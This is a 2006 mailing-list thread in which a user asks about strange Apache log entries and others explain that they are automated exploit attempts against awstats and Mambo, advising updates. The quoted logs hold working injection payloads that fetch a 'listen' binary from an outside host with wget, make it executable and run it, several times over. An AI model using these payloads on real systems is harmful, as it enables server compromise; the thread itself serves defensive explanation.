Hi all. Does anyone know what all this lot is please? 62.171.219.110 - - [05/Jan/2006:19:54:41 +0000] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 328 62.171.219.110 - - [05/Jan/2006:19:54:43 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 328 62.171.219.110 - - [05/Jan/2006:19:54:44 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 336 62.171.219.110 - - [05/Jan/2006:19:54:45 +0000] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 404 320 62.171.219.110 - - [05/Jan/2006:19:54:46 +0000] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 404 319 62.171.219.110 - - [05/Jan/2006:19:54:47 +0000] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 404 326 62.171.219.110 - - [05/Jan/2006:19:54:48 +0000] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 404 324 62.171.219.110 - - [05/Jan/2006:19:54:49 +0000] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 404 330 Regards Keith
suse@karsites.net wrote:
Hi all. Does anyone know what all this lot is please?
62.171.219.110 - - [05/Jan/2006:19:54:41 +0000] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 328 62.171.219.110 - - [05/Jan/2006:19:54:43 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 328 62.171.219.110 - - [05/Jan/2006:19:54:44 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 336 62.171.219.110 - - [05/Jan/2006:19:54:45 +0000] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 404 320 62.171.219.110 - - [05/Jan/2006:19:54:46 +0000] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 404 319 62.171.219.110 - - [05/Jan/2006:19:54:47 +0000] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 404 326 62.171.219.110 - - [05/Jan/2006:19:54:48 +0000] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 404 324 62.171.219.110 - - [05/Jan/2006:19:54:49 +0000] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 404 330
Hi These are pretty obviously tries to exploit different CMS and other scripts for common bugs. Nothing to worry about unless you run some of them... I regularly see lots of such requests for current (and older) security problems in various webapplications and servers (IIS...)... The most important thing is you try to stay up2date with all installed 3rd party applications when new versions appear Matt
On Thu, Jan 05, 2006 at 08:17:53PM +0000, suse@karsites.net wrote:
Hi all. Does anyone know what all this lot is please?
[...] What you see are attempts to exploit known vulnerabilites in various web software (awstats, mambo, phpBB, ...). As long as you have no vulnerable version of these installed, these log entries can be considered spam :)
Thankyou for your replies. I keep updated regularly, so I'm ok. Keith Roberts On Thu, 5 Jan 2006, Michel Messerschmidt wrote:
To: suse-security@suse.com From: Michel Messerschmidt <lists@michel-messerschmidt.de> Subject: Re: [suse-security] Strange Apache Log entries
On Thu, Jan 05, 2006 at 08:17:53PM +0000, suse@karsites.net wrote:
Hi all. Does anyone know what all this lot is please?
[...]
What you see are attempts to exploit known vulnerabilites in various web software (awstats, mambo, phpBB, ...). As long as you have no vulnerable version of these installed, these log entries can be considered spam :)
participants (3)
-
Matthias Keller -
Michel Messerschmidt -
suse@karsites.net